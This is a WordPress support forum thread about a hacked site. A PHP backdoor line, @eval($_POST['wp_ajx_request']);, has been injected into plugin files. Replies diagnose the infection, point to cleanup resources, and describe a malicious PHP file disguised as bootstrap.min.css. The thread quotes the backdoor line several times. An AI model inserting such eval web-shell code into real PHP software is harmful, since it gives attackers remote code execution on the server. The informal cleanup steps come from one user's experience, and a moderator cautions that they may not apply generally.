error @eval($_POST[“wp_ajx_request”]);

  • sasanam

    (@sasanam)


    8 years ago

    hi icant install any plugin !!!

    this code will appear on all my plugin headres and disable my pluging

    @eval($_POST[“wp_ajx_request”]);

    what should i do ?

Viewing 5 replies - 1 through 5 (of 5 total)
  • abletec

    (@abletec)

    8 years ago

    Hello, sasanam & welcome. Could you please provide a site url? I’m suspecting a possible site compromise, but I’d like the url just to check a few things out before definitively arriving at that conclusion.

    Thread Starter sasanam

    (@sasanam)

    8 years ago

    http://omcc.ir but its down because all plugin disabled by this virus

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    8 years ago

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    estudiramis

    (@estudiramis)

    7 years, 8 months ago

    Hi I Had the same problem but I found why happening
    The problem is one of your installed pluguins ( may be one not installed direct from ww.wp.xz.cn)

    The Virus is inside a hiden PHP file called; bootstrap.min.css Is not really a .css is a php file.
    First of all:
    make your back up.
    then erase the file. bootstrap.min.css you must looking for inside your pluguins folders
    and rename the files afected usually this ones:
    ./wp-admin/includes/class-pclzip.php_bak
    ./wp-content/plugins/revslider/revslider.php
    ./wp-content/plugins/title-remover/title-remover.php
    etc…
    You will se that the firs line is extralong with the hacked line and text: @eval($_POST[“wp_ajx_request”]); many times.
    You must erase the first line in each .php file an rename it just : <?php

    in the uploads folder you must erase the duplicated files with this size: 122×356 px

    You must activate the pluguins again and everything will be in its place.

    Salud!

    • This reply was modified 7 years, 8 months ago by estudiramis.
    • This reply was modified 7 years, 8 months ago by estudiramis.
    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    7 years, 8 months ago

    @estudiramis, that may be YOUR experience, but not necessary the OP’s.

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘error @eval($_POST[“wp_ajx_request”]);’ is closed to new replies.